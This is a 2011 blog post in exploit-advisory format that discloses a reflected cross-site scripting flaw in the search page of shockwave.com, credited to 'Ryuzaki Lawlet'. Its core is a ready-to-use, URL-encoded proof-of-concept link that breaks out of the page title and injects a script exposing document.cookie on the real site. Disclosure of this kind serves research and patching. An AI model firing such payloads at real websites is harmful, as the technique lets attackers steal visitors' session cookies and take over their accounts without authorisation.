Sunday, November 13, 2011

Shockwave.com Cross Site Scripting

 
 
# Exploit Title: shockwave.com Cross Site Scripting Vulnerability
# Date: 12/11/2011 - 04:00am
# Author: Ryuzaki Lawlet
# Website: http://jusryuz.blogspot.com
# Tested On: WinXP
# Platform: -
# Email: ryuzaki_l@y7mail.com

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

[$] Vulnerable : http://www.domain.com/search.jsp?q=

[$] Preview Sites:

[~]
http://www.shockwave.com/search.jsp?q=%22%3E%3C/title%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
[XSS]

0 comments:

Post a Comment